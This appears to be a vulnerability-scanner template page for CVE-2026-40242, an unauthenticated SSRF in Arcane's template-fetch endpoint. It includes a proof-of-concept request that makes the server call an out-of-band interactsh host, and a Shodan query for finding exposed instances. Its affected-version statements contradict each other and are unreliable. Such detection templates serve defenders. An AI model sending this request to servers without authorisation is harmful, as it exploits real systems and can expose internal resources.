Arcane <= 1.17.2 - Server-Side Request Forgery
CVE-2026-40242
Early Release
Description
Arcane <= 1.17.3 contains an unauthenticated server-side request forgery caused by lack of URL scheme and host validation in /api/templates/fetch endpoint, letting remote attackers perform SSRF, exploit requires no authentication.
Severity
High
CVSS Score
7.2
Exploit Probability
0%
Affected Product
arcane
Published Date
April 17, 2026
Template Author
0x_akoko
CVE-2026-40242.yaml
id: CVE-2026-40242
info:
name: Arcane <= 1.17.2 - Server-Side Request Forgery
author: 0x_Akoko
severity: high
description: |
Arcane <= 1.17.3 contains an unauthenticated server-side request forgery caused by lack of URL scheme and host validation in /api/templates/fetch endpoint, letting remote attackers perform SSRF, exploit requires no authentication.
impact: |
Remote attackers can make the server perform arbitrary HTTP requests, potentially accessing internal resources or sensitive data.
remediation: |
Upgrade to version 1.17.3 or later.
reference:
- https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj
- https://nvd.nist.gov/vuln/detail/CVE-2026-40242
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2026-40242
cwe-id: CWE-918
epss-score: 0.00395
epss-percentile: 0.60389
metadata:
verified: true
max-request: 1
vendor: getarcaneapp
product: arcane
shodan-query: http.html:"arcane"
tags: cve,cve2026,arcane,ssrf,oast,unauth
http:
- raw:
- |
GET /api/templates/fetch?url=http://{{interactsh-url}}/test.json HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(interactsh_protocol, "http")
- contains(content_type, "application/json")
condition: and
# digest: 4a0a00473045022014daf0c33bc875a2de8671840fc1356b5fe80a4e624db8bd64d85be0b67eaad9022100d22be92113a29d4b6e604cfe9c0b72930f1d3303343a720d6fd6ba1b2250f409:922c64590222798bb761d5b6d8e729507.2Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-40242
CWE ID:
cwe-918
Remediation Steps
Upgrade to version 1.17.3 or later.